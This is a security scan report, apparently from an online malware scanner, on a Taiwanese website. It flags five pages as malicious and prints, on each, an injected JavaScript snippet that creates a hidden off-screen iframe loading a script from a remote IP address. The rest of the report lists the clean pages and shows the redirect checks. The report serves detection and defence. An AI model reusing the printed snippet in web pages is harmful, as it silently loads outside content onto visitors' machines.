Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hsiangsun.com.tw
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hsiangsun.com.tw/ | 200 OK Content-Length: 38836 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ited09() {
var static='ajax';
var controller='index.php';
var ited = document.createElement('iframe');
ited.src = 'http://69.161.130.183/rel.php';
ited.style.position = 'absolute';
ited.style.color = '45';
ited.style.height = '45px';
ited.style.width = '45px';
ited.style.left = '100045';
ited.style.top = '100045';
if (!document.getElementById('ited')) {
document.write('<p id=\'ited\' class=\'ited09\' ></p>');
document.getElementById('ited').appendChild(ited);
Antivirus reports:
| ||
http://www.hsiangsun.com.tw/index.php?Act=3000&w_id=d8cf84a67c44171c321735f7808060b1 | 200 OK Content-Length: 75656 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ited09() {
var static='ajax';
var controller='index.php';
var ited = document.createElement('iframe');
ited.src = 'http://69.161.130.183/rel.php';
ited.style.position = 'absolute';
ited.style.color = '45';
ited.style.height = '45px';
ited.style.width = '45px';
ited.style.left = '100045';
ited.style.top = '100045';
if (!document.getElementById('ited')) {
document.write('<p id=\'ited\' class=\'ited09\' ></p>');
document.getElementById('ited').appendChild(ited);
Antivirus reports:
| ||
http://www.hsiangsun.com.tw/index.php?Act=3000&w_id=156937295da8497eeee6d211890de2a0 | 200 OK Content-Length: 30800 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ited09() {
var static='ajax';
var controller='index.php';
var ited = document.createElement('iframe');
ited.src = 'http://69.161.130.183/rel.php';
ited.style.position = 'absolute';
ited.style.color = '45';
ited.style.height = '45px';
ited.style.width = '45px';
ited.style.left = '100045';
ited.style.top = '100045';
if (!document.getElementById('ited')) {
document.write('<p id=\'ited\' class=\'ited09\' ></p>');
document.getElementById('ited').appendChild(ited);
Antivirus reports:
| ||
http://www.hsiangsun.com.tw/index.php?Act=3000&w_id=2625705537034693cbcbcf8bda7deca5 | 200 OK Content-Length: 33109 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ited09() {
var static='ajax';
var controller='index.php';
var ited = document.createElement('iframe');
ited.src = 'http://69.161.130.183/rel.php';
ited.style.position = 'absolute';
ited.style.color = '45';
ited.style.height = '45px';
ited.style.width = '45px';
ited.style.left = '100045';
ited.style.top = '100045';
if (!document.getElementById('ited')) {
document.write('<p id=\'ited\' class=\'ited09\' ></p>');
document.getElementById('ited').appendChild(ited);
Antivirus reports:
| ||
http://www.hsiangsun.com.tw/index_p.php?Act=9020 | 200 OK Content-Length: 11600 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ited09() {
var static='ajax';
var controller='index.php';
var ited = document.createElement('iframe');
ited.src = 'http://69.161.130.183/rel.php';
ited.style.position = 'absolute';
ited.style.color = '45';
ited.style.height = '45px';
ited.style.width = '45px';
ited.style.left = '100045';
ited.style.top = '100045';
if (!document.getElementById('ited')) {
document.write('<p id=\'ited\' class=\'ited09\' ></p>');
document.getElementById('ited').appendChild(ited);
Antivirus reports:
| ||
http://www.hsiangsun.com.tw/online_card/tip.js | 200 OK Content-Length: 6619 Content-Type: application/x-javascript | clean |
http://www.hsiangsun.com.tw/page1.php | 200 OK Content-Length: 23613 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.hsiangsun.com.tw/photo_show/fadeslideshow.js | 200 OK Content-Length: 14223 Content-Type: application/x-javascript | clean |
http://www.hsiangsun.com.tw/page2.php | 200 OK Content-Length: 48065 Content-Type: text/html | clean |
http://www.hsiangsun.com.tw/page3.php | 200 OK Content-Length: 45972 Content-Type: text/html | clean |
http://www.hsiangsun.com.tw/index_a.php?Act=8330 | 200 OK Content-Length: 27204 Content-Type: text/html | clean |
http://www.hsiangsun.com.tw/page4.php | 200 OK Content-Length: 29736 Content-Type: text/html | clean |
http://www.hsiangsun.com.tw/page10.php | 200 OK Content-Length: 44838 Content-Type: text/html | clean |
http://www.hsiangsun.com.tw/index_a.php?Act=8200 | 200 OK Content-Length: 23763 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hsiangsun.com.tw
Result:
GET / HTTP/1.1
Host: hsiangsun.com.tw
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hsiangsun.com.tw
Referer: http://www.google.com/search?q=hsiangsun.com.tw
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hsiangsun.com.tw
Referer: http://www.google.com/search?q=hsiangsun.com.tw
Result:
The result is similar to the first query. There are no suspicious redirects found.